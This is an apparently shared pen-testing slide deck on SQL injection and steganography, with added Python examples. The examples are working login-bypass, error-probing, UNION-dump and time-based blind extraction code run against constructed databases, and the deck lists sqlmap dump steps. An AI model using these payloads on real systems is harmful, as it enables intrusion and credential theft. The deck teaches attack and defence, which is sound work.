191013607gouthamsric
Jun 21, 2024
About This Presentation
SQL Injection and Steganography in Pen Testing
Size: 5.18 MB
Language: en
Added: Jun 21, 2024
Slides: 83 pages
Slide Content
SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. It is a method of attacking web applications that have a data repository: the attacker sends specially crafted input that, once embedded in a SQL statement, causes some malicious action.
Typical goals of the attacker:
Determining the database schema
Extracting data
Adding or modifying data
Bypassing authentication
On August 17, 2009, the United States Justice Department charged an American citizen, Albert Gonzalez, and two Russians with the theft of 130 million credit card numbers using an SQL injection attack. In 2008 a sweep of automated attacks began exploiting SQL injection flaws in web applications running on Microsoft's IIS web server with SQL Server back ends (the flaws were in the applications' own query code, not in IIS or SQL Server themselves). Over 500,000 sites were compromised.
SQL injection is the ability to inject SQL commands into the database engine through an existing application. It uses publicly available input fields to gain entry to your database: SQL commands are entered into form fields instead of the expected data, and improperly coded forms let an attacker use them as an entry point to your database.
How an attack unfolds (figure: attacker, firewall, web server and DB server; a login form with User and Pass fields, the password field containing ' or 1=1--):
1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds the query string with the exploit data.
4. Application sends the SQL query to the DB.
5. DB executes the query, including the exploit, and sends data back to the application.
6. Application returns data to the user.
Unauthorized access attempt: password = ' or 1=1 --
The SQL statement becomes:
select count(*) from users where username = 'user' and password = '' or 1=1 --
Because AND binds more tightly than OR, the WHERE clause is evaluated as (username = 'user' and password = '') or 1=1, which is always true, so the count is non-zero and access is permitted. The -- turns the remainder of the original statement, including its closing quote, into a comment.
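The bypass above, run end to end, as an added example (not code from the presentation): a vulnerable login check that concatenates the form values into the query, next to the parameterised version recommended later in the deck. The users table is constructed in memory for the demonstration and the payload is the slide's.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("user", "hunter2"), ("admin", "s3cret")])
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    # The classic mistake: user-controlled values are pasted into the SQL text.
    return ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    sql = build_vulnerable_query(username, password)
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    # Parameter binding: the statement is sent with placeholders and the values
    # separately, so a quote or "--" in the input is data, never SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


PAYLOAD = "' or 1=1 --"   # the slide's payload, typed into the password field

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("user", PAYLOAD))
    # SELECT COUNT(*) FROM users WHERE username = 'user' AND password = '' or 1=1 --'
    print(login_vulnerable(db, "user", PAYLOAD))   # True: (... AND ...) OR 1=1
    print(login_safe(db, "user", PAYLOAD))         # False: no row has that password
```

The same payload works with any username, including one that does not exist, because the OR 1=1 makes the row filter irrelevant; the bound version simply looks for a password that is literally `' or 1=1 --`.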
Impact of SQL injection:
Leakage of sensitive information
Reputation decline
Modification of sensitive information
Loss of control of the DB server
Data loss
Denial of service
Types of attack:
1. First-order attacks: the attacker enters a malicious string and the modified query is executed immediately.
2. Second-order attacks: the attacker injects into persistent storage (such as a table row) that the application later treats as a trusted source; the payload fires when that stored data is used to build another query.
3. Lateral injection (Oracle): the attacker manipulates an implicit TO_CHAR() conversion of a DATE or NUMBER value by changing session settings such as NLS_DATE_FORMAT or NLS_NUMERIC_CHARACTERS, so that a value which is not a string at all still injects into the statement.
Injection channels:
Injection through user input
Injection through cookies
Injection through server variables (such as HTTP headers)
Second-order injection through previously stored data
Error-based SQL Injection
One of the most common types of SQL injection vulnerability, and also easy to detect. It relies on feeding unexpected commands or invalid input, typically through a user interface, to make the database server reply with an error that may reveal details about the schema, the DBMS version, the operating system, and sometimes even full query results.
Error-based SQL injection is an in-band technique: the attacker uses one communication channel (the HTTP request and its response) both to launch the attack and to retrieve data. The attacker deliberately makes the database raise an error, and the vulnerable application returns the server's error text instead of the requested data. Read carefully, and repeated with different inputs, these errors tell the attacker which DBMS is in use and how the vulnerable query is built, and can be used to extract the database structure piece by piece.
Example: adding SQL syntax to user input. The attacker inserts a malicious value with the goal of receiving an error message that reveals sensitive information about the database. Any SQL syntax may be tried in an input parameter: a single quote, a double quote, or SQL operators such as AND, OR and NOT.
This example shows a URL that accepts a parameter from the user, in this case the requested item:
https://example.com/index.php?item=123
The attacker tries adding a single quote at the end of the parameter value:
https://example.com/index.php?item=123'
If the database returns an error like the following, the probe succeeded:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''VALUE''.
This error message provides the attacker with:
Information about the database used: MySQL
The exact input that caused the error: the single quote
Where the error occurred in the query: right after the parameter value
For an experienced attacker this is enough to see that user input is concatenated into the query, and to plan further SQL injection attacks that can cause damage. The probing is easy to automate: a script submits a list of SQL syntax fragments in the parameter and greps each response for DBMS error strings to see which fragments trigger errors.
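The automated probing just described, as an added example rather than the presentation's own code: a small prober appends syntax fragments to a parameter value and fingerprints the DBMS from the error text that comes back. The target is a constructed stand-in for index.php?item=... backed by SQLite (so the error strings that fire here are SQLite's, not MySQL's); the signature table covers the common engines, and the hardened handler shows why binding plus a generic error page leaves the prober with nothing.

```python
import re
import sqlite3

# Error strings typical of each DBMS, as seen in verbose error pages.
ERROR_SIGNATURES = {
    "MySQL": [r"You have an error in your SQL syntax",
              r"check the manual that corresponds to your MySQL server version"],
    "PostgreSQL": [r"ERROR:\s+syntax error at or near",
                   r"unterminated quoted string"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string",
                             r"Incorrect syntax near"],
    "Oracle": [r"ORA-\d{5}"],
    "SQLite": [r"sqlite3\.OperationalError", r"unrecognized token",
               r"near \"[^\"]*\": syntax error"],
}

# Syntax fragments appended to an otherwise valid parameter value.
PROBES = ["'", "\"", "')", "' AND 1=1 --", "' AND 1=2 --"]


def fingerprint(body):
    """Return the DBMS whose error signature appears in a response body, else None."""
    for dbms, patterns in ERROR_SIGNATURES.items():
        for pat in patterns:
            if re.search(pat, body):
                return dbms
    return None


def probe(request, base_value="123"):
    """Send each probe via request(value) -> body; return (probe, dbms) for every error hit."""
    findings = []
    for p in PROBES:
        dbms = fingerprint(request(base_value + p))
        if dbms:
            findings.append((p, dbms))
    return findings


# --- constructed stand-in for index.php?item=... backed by SQLite ---
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
_conn.execute("INSERT INTO items VALUES (123, 'widget')")


def vulnerable_item_page(item):
    """Concatenates the parameter and echoes the raw DB error, as on the slide."""
    try:
        rows = _conn.execute("SELECT name FROM items WHERE id = '%s'" % item).fetchall()
        return "Item: " + ", ".join(r[0] for r in rows)
    except sqlite3.OperationalError as e:
        return "sqlite3.OperationalError: %s" % e


def hardened_item_page(item):
    """Binds the parameter and never shows DB internals to the client."""
    try:
        rows = _conn.execute("SELECT name FROM items WHERE id = ?", (item,)).fetchall()
        return "Item: " + ", ".join(r[0] for r in rows)
    except sqlite3.OperationalError:
        return "Sorry, something went wrong."


if __name__ == "__main__":
    print(probe(vulnerable_item_page))   # [("'", 'SQLite'), ("')", 'SQLite')]
    print(probe(hardened_item_page))     # []
```

Against a real site the `request` callable would perform the HTTP GET; the two probes that break the quoting (`'` and `')`) are the ones that produce errors, while the balanced ones (`' AND 1=1 --`) are the starting point for boolean-based blind injection once errors are suppressed.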
Error-Based SQL Injection Prevention
Union-based SQL Injection
When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This is a SQL injection UNION attack.
Union example: the UNION keyword executes one or more additional SELECT queries and appends their results to the original query, e.g.
select a, b from table1 union select c, d from table2
returns a single result set with two columns, containing the values of columns a and b from table1 followed by those of columns c and d from table2.
Conditions for a UNION query to work:
The individual queries must return the same number of columns.
The data types in each column must be compatible between the individual queries.
In practice the attacker first finds the column count, by injecting ORDER BY n with increasing n until the database complains, or by injecting UNION SELECT NULL, NULL, ... with an increasing number of NULLs until the query succeeds.
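A UNION attack carried through, as an added example that is not part of the presentation: first the column count of the vulnerable SELECT is found with ORDER BY, then a second SELECT over the users table is appended, padded with NULLs to satisfy the column-count condition. The shop database is constructed in-memory SQLite, whose loose typing satisfies the type-compatibility condition automatically; on stricter engines the NULL padding is what keeps the UNION valid.

```python
import sqlite3

# Constructed shop database: a public products table and a sensitive users table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.5);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
""")


def search_products(term):
    """Vulnerable search endpoint: the term is concatenated into a LIKE pattern."""
    sql = "SELECT name, price FROM products WHERE name LIKE '%%%s%%'" % term
    return conn.execute(sql).fetchall()


def find_column_count(query_fn, max_cols=10):
    """ORDER BY n is accepted while n <= number of columns and errors once it exceeds it."""
    for n in range(1, max_cols + 1):
        try:
            query_fn("x' ORDER BY %d --" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_dump(query_fn, table, columns, ncols):
    """Append a SELECT over another table, padding with NULLs to match the column count."""
    if len(columns) > ncols:
        raise ValueError("more columns requested than the original query returns")
    select_list = ", ".join(columns + ["NULL"] * (ncols - len(columns)))
    payload = "x' UNION SELECT %s FROM %s --" % (select_list, table)
    return query_fn(payload)


if __name__ == "__main__":
    n = find_column_count(search_products)            # 2
    print(n)
    print(union_dump(search_products, "users", ["username", "password"], n))
    # [('admin', 's3cret'), ('bob', 'hunter2')]
    print(union_dump(search_products, "sqlite_master", ["sql"], n))   # schema leakage
```

The search term `x` is chosen so the original SELECT returns nothing and only the injected rows come back; the last call shows that the same trick against the catalogue table (sqlite_master here, information_schema on MySQL or PostgreSQL) hands over the schema the attacker needs for the next query.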
Time-based SQL Injection
This type of blind SQL injection relies on sending queries that make the database pause for a chosen number of seconds before the vulnerable application responds. The application returns no data and no error; the success of the attack is judged purely from the time the application takes to deliver the response.
1' AND sleep(10)--
Because the injected sleep(10) forces a 10-second delay, the reply arrives only when that period expires. Putting a condition in front of the sleep turns the delay into a one-bit oracle that can be used to extract data character by character. (sleep() is MySQL's function; PostgreSQL uses pg_sleep() and Microsoft SQL Server uses WAITFOR DELAY.)
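The character-by-character extraction that the conditional sleep enables, as an added example (not from the presentation): the endpoint leaks nothing in its response, so the attacker measures response time instead. SQLite has no sleep() of its own, so the block registers a Python function under that name to emulate MySQL's; the users table, its password and the shortened delay are constructed for the demonstration.

```python
import sqlite3
import time

DELAY = 0.1   # seconds; the slide uses sleep(10), shortened here for the demonstration

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'ab1')")   # constructed secret


def _sleep(seconds):
    time.sleep(seconds)
    return 0


# SQLite has no SLEEP(); register one so the MySQL-style payload works here.
conn.create_function("sleep", 1, _sleep)


def vulnerable_lookup(user_id):
    """Blind endpoint: the response never changes, only how long it takes."""
    sql = "SELECT COUNT(*) FROM users WHERE username = '%s'" % user_id
    conn.execute(sql).fetchall()
    return "ok"


def timed(fn, payload):
    t0 = time.perf_counter()
    fn(payload)
    return time.perf_counter() - t0


def char_at(fn, position, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover one password character: the query sleeps only when the guess is right."""
    for c in alphabet:
        payload = ("admin' AND (SELECT CASE WHEN substr(password,%d,1)='%s' "
                   "THEN sleep(%s) ELSE 0 END FROM users WHERE username='admin') --"
                   % (position, c, DELAY))
        if timed(fn, payload) >= DELAY / 2:
            return c
    return None


def extract_password(fn, length):
    return "".join(char_at(fn, i) or "?" for i in range(1, length + 1))


if __name__ == "__main__":
    print(extract_password(vulnerable_lookup, 3))   # ab1, one sleep per character
```

The threshold is half the requested delay, which is why real tools use delays of several seconds: on a network, jitter has to be well below the delay or the oracle misreads a character. Binary search over the character range (using substr(...) < 'm' instead of equality) cuts the number of requests from the alphabet size to its logarithm.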
SQL Map
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It is used to test whether a website is vulnerable to SQL injection. It has a powerful detection engine, many features for the penetration tester, and a broad range of switches, ranging from database fingerprinting to fetching data from the database and beyond.
SQL Map Features
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
Support to:
Connect directly to the database without passing via a SQL injection, given DBMS credentials, IP address, port and database name.
Dump database tables entirely, a range of entries, or specific columns as per the user's choice.
Search for specific database names, specific tables across all databases, or specific columns across all databases' tables.
Download and upload any file from or to the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
Establish an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per the user's choice.
Escalate the database process user's privileges via Metasploit's Meterpreter getsystem command.
Installing SQL Map
sqlmap comes pre-installed with Kali Linux, which is the preferred choice of most penetration testers. On other Debian-based Linux systems it can be installed with the command sudo apt-get install sqlmap
Using sqlmap to test a website for SQL injection vulnerability, with the target URL (including the parameter under test) passed via -u:
Step 1: List the existing databases (--dbs)
Step 2: List the tables in a particular database (-D <database> --tables)
Step 3: List the columns of a particular table (-D <database> -T <table> --columns)
Step 4: Dump the data from the columns (-D <database> -T <table> -C <col1>,<col2> --dump)
Reasons SQL injection remains common:
Websites require constant access to the database, so the web application and its database connection must always be reachable.
Network firewalls provide little or no defense, because the attack travels inside ordinary HTTP requests that the firewall has to allow.
Antivirus programs are equally ineffective, because no malware is involved: the payload is plain text that the application itself turns into a query.
How to Prevent SQL Injections (SQLi): generic tips
Step 1: Train and maintain awareness
Step 2: Do not trust any user input
Step 3: Use allowlists (whitelists), not blocklists (blacklists)
Step 4: Adopt the latest technologies
Step 5: Employ verified mechanisms
Step 6: Scan regularly
1. Comprehensive data sanitization: web sites must validate all user input. For example, e-mail addresses should be filtered to allow only the characters permitted in an e-mail address. Input validation catches many attempts to sneak SQL through web channels, but on its own it is not a complete defense (see point 4).
2. Use a web application firewall: a popular example is the free, open source module ModSecurity, usually deployed with the OWASP Core Rule Set. It provides a sophisticated and continually updated set of rules to filter potentially dangerous web requests.
3. Limit database privileges by context: create multiple database user accounts with the minimum level of privilege for their usage environment. For example, the code behind a login page should query the database using an account limited to the relevant credentials table. This way, a breach through this channel cannot be leveraged to compromise the entire database.
4. Avoid constructing SQL queries from user input: even data sanitization routines can be flawed. Using variable binding with prepared statements (parameterised queries), or stored procedures that take parameters, is much safer than building full query strings, because the DBMS receives the statement and the data separately and never parses the data as SQL.
Summary: SQL injection is a technique for exploiting applications that use relational databases as their back end. Applications compose SQL statements and send them to the database; SQL injection exploits the fact that many of these applications concatenate the fixed part of a SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
The technique is based on malformed user-supplied data that transforms innocent SQL calls into malicious ones, causing unauthorized access, deletion of data, or theft of information. Any database can be the target of SQL injection, whatever the vendor. The vulnerability lies in the application layer, outside the database, and exists from the moment the application builds queries from untrusted data and has a connection into the database.
Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is deliberately vulnerable. Its primary objective is to give web security practitioners a legal environment in which to test their skills and tools.
DVWA security levels for attacks:
Low: free to exploit all the known vulnerabilities
Medium: all entry-level validation and filtering in place
High: tight security
(DVWA also ships an Impossible level, which is meant to be secure and serves as the reference for correct code.)
Installation: DVWA is a web application coded in PHP that uses a MySQL back-end database, so it needs a web server, PHP and MySQL installed in order to run. The easiest way to install DVWA is to download and install XAMPP, which bundles all three.
STEGANOGRAPHY
What is Steganography? Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and the intended recipient, suspects the existence of the message. It is a form of security through obscurity. The word steganography is of Greek origin and means "concealed writing", from the Greek words steganos, meaning "covered or protected", and graphein, meaning "writing". In short, steganography means hiding one piece of data within another.
Example
Since everyone can read, encoding text in neutral sentences is doubtfully effective
Reading the first letter of each word:
Since Everyone Can Read, Encoding Text In Neutral Sentences Is Doubtfully Effective
gives "Secret inside".
"The goal of steganography is to hide messages in such a way that no one apart from the intended recipient even knows that a message has been sent." This is achieved by concealing the existence of the information within seemingly harmless carriers, or covers, as the following figure illustrates (figure: a secret message embedded in a cover object to produce a stego object).
History of Steganography
The first recorded uses of steganography can be traced back to 440 BC, when Herodotus mentions two examples of steganography in his Histories. Demaratus sent a warning about a forthcoming attack on Greece by writing it directly on the wooden backing of a wax tablet before applying its beeswax surface. Wax tablets were in common use then as reusable writing surfaces, sometimes used for shorthand. The ancient Chinese wrote messages on fine silk, which was then crunched into a tiny ball and covered in wax; the messenger then swallowed the ball of wax. Special "inks" were important steganographic tools even during the Second World War. During the Second World War a technique was developed to shrink a page of text photographically into a dot less than one millimeter in diameter, and then hide this microdot in an apparently innocuous letter. (The first microdot has been spotted
Physical Techniques
Hidden messages within wax tablets
Hidden messages on a messenger's body
Hidden messages on paper written in secret inks
Messages written in Morse code on knitting yarn and then knitted into a piece of clothing worn by a courier
Messages written on envelopes in the area covered by postage stamps
Digital Techniques
Concealing messages within the lowest bits of noisy images or sound files
Chaffing and winnowing
Modifying the echo of a sound file (echo steganography)
Including data in ignored sections of a file, such as after the logical end of the carrier file
Combined Crypto-Steganography (figure: encryption combined with steganography, the encrypted message merged invisibly into the cover)
Basic Steganography Model
Steganography Terms
Carrier or Cover File: the original message or file inside which the hidden information will be stored.
Stego-Medium: the medium in which the information is hidden (the carrier after embedding).
Embedded or Payload: the information which is to be hidden or concealed.
Steganalysis: the process of detecting hidden information inside a file.
Steganography in "TEXT", Steganography in "IMAGES", Steganography in "AUDIO"
Text Steganography Methods
Text steganography in markup languages (HTML)
Text steganography using specific characters in words
Line shifting method
Word shifting
Open spaces
Semantic methods
Character encoding
Examples of Text Steganography
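Two of the listed text methods implemented, as an added example that is not part of the presentation: the acrostic reading from the "Secret inside" slide, and the open-space method, which hides a bit in every gap between words (one space for 0, two spaces for 1) so the visible text is unchanged. The cover text is constructed from the slide's own sentence; the NUL terminator and the two-space convention are this example's choices.

```python
import re


def acrostic(sentence):
    """The slide's example: read the first letter of each word."""
    return "".join(w[0] for w in sentence.split()).upper()


def _text_to_bits(s):
    return "".join(format(b, "08b") for b in s.encode("utf-8"))


def embed_open_space(cover, secret):
    """Hide `secret` in the gaps between the words of `cover`:
    one space between two words encodes 0, two spaces encode 1.
    A NUL byte (eight 0 bits) marks the end of the message."""
    words = cover.split()
    bits = _text_to_bits(secret) + "00000000"
    if len(bits) > len(words) - 1:
        raise ValueError("cover too short: need %d word gaps, have %d"
                         % (len(bits), len(words) - 1))
    pieces = []
    for i, w in enumerate(words[:-1]):
        pieces.append(w)
        pieces.append("  " if i < len(bits) and bits[i] == "1" else " ")
    pieces.append(words[-1])
    return "".join(pieces)


def extract_open_space(stego):
    gaps = re.split(r"( +)", stego)[1::2]          # the runs of spaces between words
    bits = "".join("1" if len(g) == 2 else "0" for g in gaps)
    data = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = int(bits[i:i + 8], 2)
        if byte == 0:                               # terminator reached
            break
        data.append(byte)
    return data.decode("utf-8", errors="replace")


COVER = ("Since everyone can read, encoding text in neutral sentences "
         "is doubtfully effective. ") * 3          # constructed cover text

if __name__ == "__main__":
    print(acrostic("Since everyone can read, encoding text in neutral sentences "
                   "is doubtfully effective"))      # SECRETINSIDE
    stego = embed_open_space(COVER, "hi")
    print(repr(stego))
    print(extract_open_space(stego))                # hi
```

The capacity is one bit per word gap, which is why the cover has to be far longer than the secret; the weakness, and the steganalyst's handle, is that double spaces between words are rare in ordinary text, and any editor that normalises whitespace destroys the message.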
Image Steganography
Using image files as hosts for steganographic messages takes advantage of the limited capabilities of the human visual system: small changes to pixel values, such as replacing the least significant bit of each sample, are not perceptible.
Audio Steganography
Embedding secret messages into digital sound is known as audio steganography. To embed data secretly in a digital audio file, a few techniques have been introduced:
LSB coding
Phase coding
Parity coding
Spread spectrum
Steganalysis is the art and science of detecting a secret communication. Hiding a message will most likely leave detectable traces in the cover medium: the information hiding process changes the statistical properties of the cover, and it is these changes that a steganalyst attempts to detect. The process of attempting to detect such statistical traces is called statistical steganalysis.
IMPORTANT ASPECTS OF STEGANALYSIS
Detecting hidden information
Disabling steganography
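The LSB image technique from the digital techniques list and the statistical steganalysis described above, in one added example that is not part of the presentation. The cover is a constructed 64x64 grayscale image (a raw bytearray of pixel values rather than a file) quantised to even values, so its LSB plane is all zero; embed_lsb() writes a length header and the payload into successive pixel LSBs, and pov_chi_square() is the pairs-of-values statistic from Westfeld and Pfitzmann's chi-square attack: embedding equalises the counts of each value pair (2k, 2k+1), so the statistic collapses in the embedded region.

```python
WIDTH, HEIGHT = 64, 64


def make_cover():
    """Constructed 8-bit grayscale 'image': 8x8 blocks of a stepped gradient,
    quantised to even values so the LSB plane of the cover is all zero."""
    return bytearray(((x // 8 + y // 8) * 2) % 256
                     for y in range(HEIGHT) for x in range(WIDTH))


def _bits(data):
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed_lsb(cover, payload):
    """Write a 32-bit length header plus payload into successive pixel LSBs."""
    message = len(payload).to_bytes(4, "big") + payload
    if len(message) * 8 > len(cover):
        raise ValueError("payload too large for this cover")
    stego = bytearray(cover)
    for i, bit in enumerate(_bits(message)):
        stego[i] = (stego[i] & 0xFE) | bit          # pixel changes by at most 1
    return stego


def _read_bits(pixels, start, count):
    value = 0
    for i in range(start, start + count):
        value = (value << 1) | (pixels[i] & 1)
    return value


def extract_lsb(stego):
    length = _read_bits(stego, 0, 32)
    return bytes(_read_bits(stego, 32 + 8 * k, 8) for k in range(length))


def embedded_pixels(payload):
    """Number of pixels an embed_lsb() of this payload touches."""
    return (4 + len(payload)) * 8


def pov_chi_square(pixels):
    """Pairs-of-values statistic: LSB embedding pushes the counts of each
    pair (2k, 2k+1) towards equality, so the statistic drops in embedded regions."""
    counts = [0] * 256
    for p in pixels:
        counts[p] += 1
    chi = 0.0
    for k in range(128):
        even, odd = counts[2 * k], counts[2 * k + 1]
        expected = (even + odd) / 2
        if expected > 0:
            chi += (even - expected) ** 2 / expected
    return chi


if __name__ == "__main__":
    cover = make_cover()
    secret = b"attack at dawn"
    stego = embed_lsb(cover, secret)
    n = embedded_pixels(secret)
    print(extract_lsb(stego))                               # b'attack at dawn'
    print(max(abs(a - b) for a, b in zip(cover, stego)))    # 1
    print(pov_chi_square(cover[:n]), pov_chi_square(stego[:n]))   # high vs low
```

No pixel moves by more than one grey level, which is the visual-system point from the image slide, yet the statistic over the first 144 pixels drops from 72 to about 9 once the message is in. A real detector slides this test over the image to find where the equalisation stops, which also estimates the message length; sequential embedding from the top-left, as here, is what makes that easy, and real tools spread the payload with a keyed pseudo-random pixel order to blunt the attack.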